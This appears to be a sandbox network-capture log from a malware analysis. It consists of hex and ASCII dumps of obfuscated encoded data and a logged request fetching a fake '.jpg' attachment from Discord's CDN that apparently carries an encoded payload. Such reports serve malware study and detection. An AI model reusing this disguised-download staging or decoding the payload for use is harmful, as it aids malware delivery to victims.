                                                                                                Data Ascii: S MMi Tpg TgO MMi TpM Tni MMi Tpg TPp MMi TpM Tng MMi Tpg TpU MMi TpM TUO MMi TpM Tng MMi TpM TUO MMi Tpg TPp MMi TpM TnT MMi TpM TnM MMi TpM TUp MMi TpM Tng MMi Tpg TPT MMi Tpg Tgi S MMP TUO TgT MMP TUO TMO MMP TUO TUT MMP TUO TiO MMP TUO TgS MMP TOS Tg
                                                                                                2021-10-26 15:35:18 UTC7584INData Raw: 67 4f 20 54 50 6e 20 54 67 70 20 4d 67 4f 20 54 50 6e 20 54 67 4f 20 4d 67 4f 20 54 50 6e 20 54 69 69 20 4d 67 4f 20 54 50 6e 20 54 55 70 20 4d 67 4f 20 54 50 6e 20 54 69 4d 20 53 20 4d 67 70 20 54 70 67 20 54 55 50 20 4d 67 70 20 54 70 67 20 54 55 6e 20 4d 67 70 20 54 70 67 20 54 69 69 20 4d 67 70 20 54 70 67 20 54 55 55 20 4d 67 70 20 54 70 67 20 54 69 53 20 4d 67 70 20 54 70 67 20 54 55 69 20 4d 67 70 20 54 70 67 20 54 67 6e 20 4d 67 70 20 54 70 67 20 54 67 50 20 4d 67 70 20 54 70 69 20 54 69 69 20 4d 67 70 20 54 70 67 20 54 6e 67 20 4d 67 70 20 54 70 67 20 54 67 4f 20 4d 67 70 20 54 70 67 20 54 67 6e 20 4d 67 70 20 54 70 67 20 54 55 4f 20 4d 67 70 20 54 70 67 20 54 6e 70 20 4d 67 70 20 54 70 67 20 54 69 4d 20 53 20 4d 67 55 20 54 70 67 20 54 67 69 20
                                                                                                Data Ascii: gO TPn Tgp MgO TPn TgO MgO TPn Tii MgO TPn TUp MgO TPn TiM S Mgp Tpg TUP Mgp Tpg TUn Mgp Tpg Tii Mgp Tpg TUU Mgp Tpg TiS Mgp Tpg TUi Mgp Tpg Tgn Mgp Tpg TgP Mgp Tpi Tii Mgp Tpg Tng Mgp Tpg TgO Mgp Tpg Tgn Mgp Tpg TUO Mgp Tpg Tnp Mgp Tpg TiM S MgU Tpg Tgi
                                                                                                2021-10-26 15:35:18 UTC7600INData Raw: 20 54 6e 4d 20 54 50 54 20 4d 67 69 20 54 6e 4d 20 54 50 67 20 4d 67 69 20 54 6e 67 20 54 50 53 20 4d 67 69 20 54 6e 4d 20 54 50 4d 20 4d 67 69 20 54 6e 4d 20 54 50 53 20 53 20 4d 67 4f 20 54 6e 69 20 54 70 55 20 4d 67 4f 20 54 6e 69 20 54 55 53 20 4d 67 4f 20 54 6e 69 20 54 70 67 20 4d 67 4f 20 54 6e 69 20 54 70 70 20 4d 67 4f 20 54 6e 69 20 54 6e 53 20 4d 67 4f 20 54 6e 50 20 54 6e 4d 20 4d 67 4f 20 54 6e 50 20 54 50 4d 20 4d 67 4f 20 54 6e 69 20 54 55 53 20 4d 67 4f 20 54 6e 50 20 54 50 67 20 4d 67 4f 20 54 6e 50 20 54 69 54 20 4d 67 4f 20 54 6e 50 20 54 50 67 20 4d 67 4f 20 54 6e 50 20 54 50 4d 20 4d 67 4f 20 54 6e 50 20 54 6e 53 20 4d 67 4f 20 54 6e 69 20 54 70 67 20 4d 67 4f 20 54 6e 50 20 54 50 53 20 53 20 4d 67 55 20 54 55 53 20 54 55 69 20 4d 67
                                                                                                Data Ascii: TnM TPT Mgi TnM TPg Mgi Tng TPS Mgi TnM TPM Mgi TnM TPS S MgO Tni TpU MgO Tni TUS MgO Tni Tpg MgO Tni Tpp MgO Tni TnS MgO TnP TnM MgO TnP TPM MgO Tni TUS MgO TnP TPg MgO TnP TiT MgO TnP TPg MgO TnP TPM MgO TnP TnS MgO Tni Tpg MgO TnP TPS S MgU TUS TUi Mg
                                                                                                2021-10-26 15:35:18 UTC7616INData Raw: 70 54 20 54 55 53 20 4d 67 4d 20 54 70 54 20 54 55 54 20 4d 67 4d 20 54 70 54 20 54 6e 67 20 4d 67 4d 20 54 70 54 20 54 6e 4d 20 4d 67 4d 20 54 70 4d 20 54 70 4f 20 4d 67 4d 20 54 70 4d 20 54 69 4f 20 4d 67 4d 20 54 70 4d 20 54 55 4d 20 4d 67 4d 20 54 70 4d 20 54 70 67 20 4d 67 4d 20 54 70 54 20 54 6e 6e 20 4d 67 4d 20 54 70 54 20 54 4f 54 20 4d 67 4d 20 54 70 4d 20 54 50 6e 20 53 20 4d 67 55 20 54 70 67 20 54 70 53 20 4d 67 55 20 54 70 69 20 54 69 4d 20 4d 67 55 20 54 70 69 20 54 69 67 20 4d 67 55 20 54 70 67 20 54 50 67 20 4d 67 55 20 54 70 67 20 54 6e 4f 20 4d 67 55 20 54 70 67 20 54 6e 53 20 4d 67 55 20 54 70 69 20 54 69 54 20 4d 67 55 20 54 70 67 20 54 55 69 20 4d 67 55 20 54 70 69 20 54 67 4f 20 4d 67 55 20 54 70 69 20 54 69 6e 20 4d 67 55 20 54 70
                                                                                                Data Ascii: pT TUS MgM TpT TUT MgM TpT Tng MgM TpT TnM MgM TpM TpO MgM TpM TiO MgM TpM TUM MgM TpM Tpg MgM TpT Tnn MgM TpT TOT MgM TpM TPn S MgU Tpg TpS MgU Tpi TiM MgU Tpi Tig MgU Tpg TPg MgU Tpg TnO MgU Tpg TnS MgU Tpi TiT MgU Tpg TUi MgU Tpi TgO MgU Tpi Tin MgU Tp
                                                                                                2021-10-26 15:35:18 UTC7632INData Raw: 70 67 20 53 20 4d 67 70 20 54 6e 6e 20 54 55 53 20 4d 67 70 20 54 6e 55 20 54 55 55 20 4d 67 70 20 54 6e 55 20 54 67 67 20 4d 67 70 20 54 6e 6e 20 54 6e 55 20 4d 67 70 20 54 6e 6e 20 54 55 67 20 4d 67 70 20 54 6e 6e 20 54 55 67 20 4d 67 70 20 54 6e 55 20 54 70 70 20 4d 67 70 20 54 6e 55 20 54 69 54 20 4d 67 70 20 54 6e 6e 20 54 6e 4f 20 4d 67 70 20 54 6e 6e 20 54 6e 55 20 4d 67 70 20 54 6e 6e 20 54 55 6e 20 4d 67 70 20 54 6e 6e 20 54 55 53 20 4d 67 70 20 54 6e 55 20 54 67 55 20 4d 67 70 20 54 6e 55 20 54 67 69 20 4d 67 70 20 54 6e 55 20 54 70 67 20 53 20 4d 67 4f 20 54 6e 4f 20 54 55 53 20 4d 67 4f 20 54 6e 55 20 54 4f 54 20 4d 67 4f 20 54 6e 4f 20 54 67 50 20 4d 67 4f 20 54 6e 4f 20 54 4d 55 20 4d 67 4f 20 54 6e 4f 20 54 55 53 20 4d 67 4f 20 54 6e 4f 20
                                                                                                Data Ascii: pg S Mgp Tnn TUS Mgp TnU TUU Mgp TnU Tgg Mgp Tnn TnU Mgp Tnn TUg Mgp Tnn TUg Mgp TnU Tpp Mgp TnU TiT Mgp Tnn TnO Mgp Tnn TnU Mgp Tnn TUn Mgp Tnn TUS Mgp TnU TgU Mgp TnU Tgi Mgp TnU Tpg S MgO TnO TUS MgO TnU TOT MgO TnO TgP MgO TnO TMU MgO TnO TUS MgO TnO
                                                                                                2021-10-26 15:35:18 UTC7648INData Raw: 20 4d 67 67 20 54 69 53 20 54 55 70 20 4d 67 67 20 54 69 54 20 54 50 53 20 4d 67 67 20 54 69 54 20 54 4d 4f 20 4d 67 67 20 54 69 53 20 54 55 70 20 4d 67 67 20 54 69 53 20 54 55 6e 20 4d 67 67 20 54 69 53 20 54 55 6e 20 4d 67 67 20 54 69 53 20 54 55 55 20 4d 67 67 20 54 69 53 20 54 55 50 20 4d 67 67 20 54 69 54 20 54 6e 55 20 4d 67 67 20 54 69 54 20 54 67 53 20 4d 67 67 20 54 69 53 20 54 55 50 20 4d 67 67 20 54 69 54 20 54 4d 55 20 4d 67 67 20 54 69 54 20 54 50 54 20 4d 67 67 20 54 69 54 20 54 4d 55 20 4d 67 67 20 54 69 54 20 54 6e 53 20 53 20 4d 4d 70 20 54 69 67 20 54 50 54 20 4d 4d 70 20 54 69 4d 20 54 70 50 20 4d 4d 70 20 54 69 4d 20 54 4f 53 20 4d 4d 70 20 54 69 4d 20 54 6e 4d 20 4d 4d 70 20 54 69 4d 20 54 70 70 20 4d 4d 70 20 54 69 67 20 54 69 53 20
                                                                                                Data Ascii: Mgg TiS TUp Mgg TiT TPS Mgg TiT TMO Mgg TiS TUp Mgg TiS TUn Mgg TiS TUn Mgg TiS TUU Mgg TiS TUP Mgg TiT TnU Mgg TiT TgS Mgg TiS TUP Mgg TiT TMU Mgg TiT TPT Mgg TiT TMU Mgg TiT TnS S MMp Tig TPT MMp TiM TpP MMp TiM TOS MMp TiM TnM MMp TiM Tpp MMp Tig TiS
                                                                                                2021-10-26 15:35:18 UTC7664INData Raw: 20 54 55 70 20 54 70 4f 20 4d 4d 70 20 54 55 70 20 54 55 70 20 4d 4d 70 20 54 55 6e 20 54 6e 55 20 4d 4d 70 20 54 55 70 20 54 6e 53 20 4d 4d 70 20 54 55 6e 20 54 69 50 20 4d 4d 70 20 54 55 6e 20 54 50 70 20 4d 4d 70 20 54 55 70 20 54 6e 4d 20 4d 4d 70 20 54 55 6e 20 54 69 67 20 4d 4d 70 20 54 55 70 20 54 6e 67 20 4d 4d 70 20 54 55 70 20 54 6e 6e 20 53 20 4d 67 55 20 54 67 50 20 54 70 54 20 4d 67 55 20 54 67 69 20 54 6e 69 20 4d 67 55 20 54 67 69 20 54 6e 50 20 4d 67 55 20 54 67 69 20 54 6e 67 20 4d 67 55 20 54 67 50 20 54 70 4d 20 4d 67 55 20 54 67 69 20 54 55 54 20 4d 67 55 20 54 67 69 20 54 55 54 20 4d 67 55 20 54 67 50 20 54 50 55 20 4d 67 55 20 54 67 69 20 54 6e 69 20 4d 67 55 20 54 67 69 20 54 6e 50 20 4d 67 55 20 54 67 69 20 54 4f 53 20 4d 67 55 20
                                                                                                Data Ascii: TUp TpO MMp TUp TUp MMp TUn TnU MMp TUp TnS MMp TUn TiP MMp TUn TPp MMp TUp TnM MMp TUn Tig MMp TUp Tng MMp TUp Tnn S MgU TgP TpT MgU Tgi Tni MgU Tgi TnP MgU Tgi Tng MgU TgP TpM MgU Tgi TUT MgU Tgi TUT MgU TgP TPU MgU Tgi Tni MgU Tgi TnP MgU Tgi TOS MgU
                                                                                                2021-10-26 15:35:18 UTC7680INData Raw: 20 54 55 4d 20 4d 67 55 20 54 69 67 20 54 67 55 20 4d 67 55 20 54 69 4d 20 54 55 6e 20 4d 67 55 20 54 69 4d 20 54 67 70 20 4d 67 55 20 54 69 4d 20 54 55 4d 20 4d 67 55 20 54 69 67 20 54 4d 55 20 4d 67 55 20 54 69 4d 20 54 67 4f 20 4d 67 55 20 54 69 4d 20 54 69 4d 20 4d 67 55 20 54 69 4d 20 54 69 53 20 4d 67 55 20 54 69 4d 20 54 55 69 20 53 20 4d 67 50 20 54 69 55 20 54 4d 55 20 4d 67 50 20 54 69 6e 20 54 55 70 20 4d 67 50 20 54 69 55 20 54 70 4f 20 4d 67 50 20 54 69 55 20 54 6e 6e 20 4d 67 50 20 54 69 55 20 54 69 67 20 4d 67 50 20 54 69 6e 20 54 55 4f 20 4d 67 50 20 54 69 55 20 54 50 53 20 4d 67 50 20 54 69 55 20 54 55 4d 20 4d 67 50 20 54 69 6e 20 54 4f 53 20 4d 67 50 20 54 69 55 20 54 50 53 20 4d 67 50 20 54 69 6e 20 54 4f 53 20 4d 67 50 20 54 69 6e 20
                                                                                                Data Ascii: TUM MgU Tig TgU MgU TiM TUn MgU TiM Tgp MgU TiM TUM MgU Tig TMU MgU TiM TgO MgU TiM TiM MgU TiM TiS MgU TiM TUi S MgP TiU TMU MgP Tin TUp MgP TiU TpO MgP TiU Tnn MgP TiU Tig MgP Tin TUO MgP TiU TPS MgP TiU TUM MgP Tin TOS MgP TiU TPS MgP Tin TOS MgP Tin
                                                                                                2021-10-26 15:35:18 UTC7696INData Raw: 20 54 6e 70 20 54 6e 6e 20 4d 67 4f 20 54 6e 70 20 54 50 69 20 4d 67 4f 20 54 6e 70 20 54 70 54 20 4d 67 4f 20 54 6e 70 20 54 67 67 20 4d 67 4f 20 54 6e 70 20 54 50 53 20 4d 67 4f 20 54 6e 70 20 54 67 69 20 4d 67 4f 20 54 6e 50 20 54 4f 53 20 4d 67 4f 20 54 6e 6e 20 54 67 4d 20 4d 67 4f 20 54 6e 70 20 54 67 69 20 4d 67 4f 20 54 6e 70 20 54 67 54 20 4d 67 4f 20 54 6e 70 20 54 67 67 20 4d 67 4f 20 54 6e 70 20 54 70 6e 20 4d 67 4f 20 54 6e 50 20 54 4f 54 20 53 20 4d 4d 55 20 54 55 70 20 54 67 4d 20 4d 4d 55 20 54 55 70 20 54 70 6e 20 4d 4d 55 20 54 55 6e 20 54 67 50 20 4d 4d 55 20 54 55 70 20 54 67 67 20 4d 4d 55 20 54 55 70 20 54 6e 55 20 4d 4d 55 20 54 55 70 20 54 55 69 20 4d 4d 55 20 54 55 70 20 54 4d 55 20 4d 4d 55 20 54 55 70 20 54 55 6e 20 4d 4d 55 20
                                                                                                Data Ascii: Tnp Tnn MgO Tnp TPi MgO Tnp TpT MgO Tnp Tgg MgO Tnp TPS MgO Tnp Tgi MgO TnP TOS MgO Tnn TgM MgO Tnp Tgi MgO Tnp TgT MgO Tnp Tgg MgO Tnp Tpn MgO TnP TOT S MMU TUp TgM MMU TUp Tpn MMU TUn TgP MMU TUp Tgg MMU TUp TnU MMU TUp TUi MMU TUp TMU MMU TUp TUn MMU
                                                                                                2021-10-26 15:35:18 UTC7712INData Raw: 67 20 53 20 54 53 55 20 53 20 69 4f 20 53 20 50 70 20 53 20 6e 67 20 53 20 54 53 55 20 53 20 69 4f 20 53 20 69 6e 20 53 20 6e 67 20 53 20 54 53 55 20 53 20 69 4f 20 53 20 50 6e 20 53 20 6e 6e 20 53 20 54 53 53 20 53 20 6e 53 20 53 20 69 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 69 20 53 20 54 53 53 20 53 20 54 53 54 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 55 4d 20 53 20 69 55 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 70 20 53 20 50 4d 20 53 20 54 4d 53 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 50 70 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 50 69 20 53 20 70 55 20 53 20 54 54 4d 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20
                                                                                                Data Ascii: g S TSU S iO S Pp S ng S TSU S iO S in S ng S TSU S iO S Pn S nn S TSS S nS S ig S pP S pP S pp S pP S pP S pn S ni S TSS S TST S TMM S TTT S UM S iU S pO S pP S pP S nT S TSp S PM S TMS S pO S pP S pP S TSg S Pp S TSp S in S Pi S pU S TTM S pp S pP S pP


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                9192.168.2.549763162.159.129.233443
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-26 15:35:18 UTC7721OUTGET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1
                                                                                                Host: cdn.discordapp.com
                                                                                                2021-10-26 15:35:18 UTC7721INHTTP/1.1 200 OK
                                                                                                Date: Tue, 26 Oct 2021 15:35:18 GMT
                                                                                                Content-Type: image/jpeg
                                                                                                Content-Length: 693967
                                                                                                Connection: close
                                                                                                CF-Ray: 6a44c0f63a426983-FRA
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 2124
                                                                                                Cache-Control: public, max-age=31536000
                                                                                                ETag: "23a5250b8d90156e7d3cdf648d28e9da"
                                                                                                Expires: Wed, 26 Oct 2022 15:35:18 GMT
                                                                                                Last-Modified: Tue, 26 Oct 2021 12:48:09 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                CF-Cache-Status: HIT
                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                Cf-Bgj: h2pri
                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                x-goog-generation: 1635252489262793
                                                                                                x-goog-hash: crc32c=la2Ogw==
                                                                                                x-goog-hash: md5=I6UlC42QFW59PN9kjSjp2g==
                                                                                                x-goog-metageneration: 1
                                                                                                x-goog-storage-class: STANDARD
                                                                                                x-goog-stored-content-encoding: identity
                                                                                                x-goog-stored-content-length: 693967
                                                                                                X-GUploader-UploadID: ADPycdugciGjaBfm1jkRHrCGp6TL-hiSTfEGgfhLw1xDKH1ZiuRprzVhtotiFAMhjRQuGamJ9-8cZedzcbOg46e7pu4
                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tFPBiLuBwT8fiGBQkHSdjr76rzdpz5mnkb84quwZzbAAF%2FiAaldDC7scp2w0C0uc%2B2Miz7WKq1yG5D4C6l2f1fTBJIT4FCG6GAKgWNj73usNi5VpcrCdliKjwbRLnqGTKCbDsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                2021-10-26 15:35:18 UTC7722INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                2021-10-26 15:35:18 UTC7722INData Raw: 53 20 55 55 20 53 20 55 55 20 53 20 4f 4f 20 53 20 50 69 20 53 20 6e 6e 20 53 20 70 55 20 53 20 50 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 6e 55 20 53 20 54 53 53 20 53 20 54 53 53 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 54 53 6e 20 53 20 70 55 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 6e 70 20 53 20 50 70 20 53 20 6e 67 20 53 20 6e 4d 20 53 20 6e 54 20 53 20 50 4d 20 53 20 6e 53 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 55 20 53 20 54 54 50 20
                                                                                                Data Ascii: S UU S UU S OO S Pi S nn S pU S Pg S in S in S ig S nU S TSS S TSS S TMM S TTT S TSn S pU S TTT S pP S pP S nS S Pg S OU S TMT S OO S ng S pO S pP S nS S On S np S Pp S ng S nM S nT S PM S nS S UT S pP S pP S nO S TSP S UP S nO S TTO S pP S pP S UU S TTP
                                                                                                2021-10-26 15:35:18 UTC7724INData Raw: 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 55 20 53 20 70 55 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 50 50 20 53 20 54 54 4f 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 6e 53 20 53 20 70 50 20 53 20 69 67 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 69 4f 20 53 20 50 70 20 53 20 6e 50 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 70 20 53 20 55 50 20 53 20 55 55 20 53 20 50 70 20 53 20 55 50 20 53 20 6e 54 20 53 20 54 53 70 20 53 20 69 55 20 53 20 55 70 20
                                                                                                Data Ascii: S On S TSi S pU S in S nS S OU S pU S pP S UT S pP S pP S PP S TTO S PM S TSU S nS S nS S pP S ig S pO S ng S TTO S pO S pP S pP S ng S PS S iO S Pp S nP S TSp S in S in S ig S TSg S TSP S in S US S in S in S TSp S UP S UU S Pp S UP S nT S TSp S iU S Up
                                                                                                2021-10-26 15:35:18 UTC7725INData Raw: 53 20 70 55 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 54 54 6e 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 54 54 54 20 53 20 54 54 55 20 53 20 6e 54 20 53 20 54 53 70 20 53 20 55 50 20 53 20 50 54 20 53 20 50 70 20 53 20 55 50 20 53 20 55 4f 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 55 53 20 53 20 54 54 4f 20 53 20 6e 69 20 53 20 55 4d 20 53 20 55 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 53 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54 70 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 54 53 53 20 53 20 55
                                                                                                Data Ascii: S pU S TTU S TMM S TTn S nO S TSp S pO S UT S pP S pp S iU S pP S TTT S TTU S nT S TSp S UP S PT S Pp S UP S UO S iO S nn S US S TTO S ni S UM S UP S US S Pn S iO S pO S US S Pn S iO S nS S US S Pp S Up S TTp S nn S pp S pP S pP S pU S TTU S TMM S TSS S U
                                                                                                2021-10-26 15:35:18 UTC7726INData Raw: 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 69 20 53 20 6e 50 20 53 20 6e 4f 20 53 20 55 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 4f 6e 20 53 20 54 4d 4d 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 50 69 20 53 20 6e 54 20 53 20 70 50 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 55 20 53 20 55 70 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 54 54 55 20 53 20 55 53 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 54 53 50 20 53 20 54 53 6e 20 53 20 54 4d 54 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 4f 6e 20 53 20 55 53 20 53 20 50 70 20
                                                                                                Data Ascii: n S in S in S Pi S nP S nO S Up S pP S pP S pn S nU S TSi S On S TMM S PP S in S in S Pn S UT S Pi S nT S pP S TTn S pP S pP S pp S UU S Up S TTU S Pn S iO S pn S ng S PS S nS S TTU S US S PT S in S in S PS S TSP S TSn S TMT S pO S pP S pP S On S US S Pp
                                                                                                2021-10-26 15:35:18 UTC7728INData Raw: 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 54 53 4d 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 54 54 4d 20 53 20 54 53 70 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 54 53 4d 20 53 20 54 54 4f 20 53 20 54 53 67 20 53 20 55 54 20 53 20 70 50 20 53 20 55 50 20 53 20 55 4f 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 54 54 67 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 55 20 53 20 55 6e 20 53 20 55 70 20 53 20 50 54 20 53 20 55 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 4f
                                                                                                Data Ascii: P S nO S TSP S TTO S nn S TTO S pP S pP S Un S TSM S Pn S iU S ni S pP S TSp S TTT S TTM S TSp S nn S pP S pP S nS S TSU S TSM S TTO S TSg S UT S pP S UP S UO S nO S in S TTg S pO S UT S pP S pP S pP S nU S Un S Up S PT S UT S in S in S PT S UT S TSn S pO
                                                                                                2021-10-26 15:35:18 UTC7729INData Raw: 6e 4d 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 55 53 20 53 20 70 50 20 53 20 55 55 20 53 20 69 4f 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 55 20 53 20 55 70 20 53 20 54 53 50 20 53 20 69 67 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 50 50 20 53 20 70 4f 20 53 20 70 70 20 53 20 55 69 20 53 20 55 70 20 53 20 54 53 55 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 4f 4f 20 53 20 55 69 20 53 20 54 54 54 20 53 20 54 54 54 20 53 20 55 55 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 50 50 20 53 20 55 55 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 67 20 53 20 69 4f
                                                                                                Data Ascii: nM S OO S pP S pP S pU S US S pP S UU S iO S Pg S OU S TMT S OO S nU S Up S TSP S ig S TMT S pU S PP S pO S pp S Ui S Up S TSU S TST S nU S UM S OO S Ui S TTT S TTT S UU S OO S pP S pP S nS S pU S TTT S PP S UU S OO S pP S pP S US S Pn S iO S pU S ng S iO
                                                                                                2021-10-26 15:35:18 UTC7730INData Raw: 70 50 20 53 20 54 53 55 20 53 20 6e 55 20 53 20 55 55 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 6e 20 53 20 50 6e 20 53 20 4f 55 20 53 20 54 54 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 53 20 53 20 70 50 20 53 20 6e 4f 20 53 20 50 70 20 53 20 6e 55 20 53 20 69 55 20 53 20 70 55 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 69 6e 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 55 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 53 6e 20 53 20 70 70 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 54 54 69 20 53 20 70 6e 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54 67 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 54 54 4f 20 53 20 69 6e 20 53
                                                                                                Data Ascii: pP S TSU S nU S UU S in S PT S UP S ng S in S Pn S OU S TTi S pP S TSp S US S pP S nO S Pp S nU S iU S pU S ng S TTp S nS S in S ng S TTp S nU S pO S ng S TSn S pp S TSP S in S US S TTi S pn S US S Pp S Up S TTg S nn S pp S pP S pP S ng S TTU S TTO S in S
                                                                                                2021-10-26 15:35:18 UTC7732INData Raw: 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 55 20 53 20 6e 6e 20 53 20 55 55 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 54 54 54 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 70 20 53 20 54 53 55 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 53 20 53 20 54 53 70 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 54 20 53 20 55 70 20 53 20 54 4d 54 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 54 53 53 20 53 20 54 53 4f 20 53 20 54 53 50 20 53 20 4f 55 20 53 20 50 54 20 53 20 55 4f 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e
                                                                                                Data Ascii: S pP S UT S pP S pP S Un S UU S nn S UU S TSp S UO S UU S TTT S in S TSM S in S in S Up S TSU S pn S nU S TSi S TSS S TSp S PP S in S in S in S TTT S Up S TMT S TTO S pP S pP S nS S TSU S OS S Pi S TTO S TSS S TSO S TSP S OU S PT S UO S ig S in S in S in
